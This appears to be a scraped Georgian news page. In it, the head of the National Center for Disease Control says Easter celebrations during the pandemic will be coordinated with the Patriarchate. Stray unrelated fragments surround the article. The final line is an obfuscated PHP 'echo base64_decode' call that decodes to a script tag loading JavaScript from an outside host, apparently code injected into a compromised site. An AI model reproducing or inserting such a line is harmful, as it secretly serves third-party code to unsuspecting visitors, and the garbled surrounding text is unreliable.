celsiusi
ავერსი შნაიდერი
დაავადებათა კონტროლის ეროვნული ცენტრის ხელმძღვანელის ამირან გამყრელიძის განცხადებით, პანდემიის გათვალისწინებით, აღდგომის დღესასწაულის უმტკივნეულოდ გამართვასთან დაკავშირებით პოზიციები საპატრიარქოსთანაც შეჯერდება.
 
როგორც მან ჟურნალისტებს უწყებათაშორისი საკოორდინაციო საბჭოს სხდომის დასრულების შემდეგ განუცხადა, ამ თემაზე მსჯელობა უკვე მიმდინარეობს.
 
„დაავადებათა კონტროლის ცენტრს აქვს თავისი რეკომენდაციები. რა თქმა უნდა, იქნება შეხვედრები, საუბარი საპატრიარქოსთან, რათა, როგორც შარშან, ჩვენ საერთო გადაწყვეტილებამდე მივიდეთ, რომ აღდგომამ, ჩვენი ქვეყნისა და მოსახლეობის ამ ყველაზე დიდმა დღესასწაულმა ჩაიაროს ისე, როგორც ჩვენ გვეკადება და მოსახლეობას სჭირდება. ამასთან, მეორე მხრივ დაცული უნდა იყოს ეპიდსაწინააღმდეგო ღონისძიებები, რომ დამატებითი სტიმული არ გახდეს ეპიდემიის გავრცელების. ვფიქრობ, შეთანხმებამდე მივალთ და თან ისეთზე, რომ ზომიერ ფარგლებში ვიდღესასწაულოთ ჩვენი დღესასწაული და დავიცვათ ეპიდსაწინააღმდეგო ღონისძიებებიც“, - განაცხადა გამყრელიძემ.
1349
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");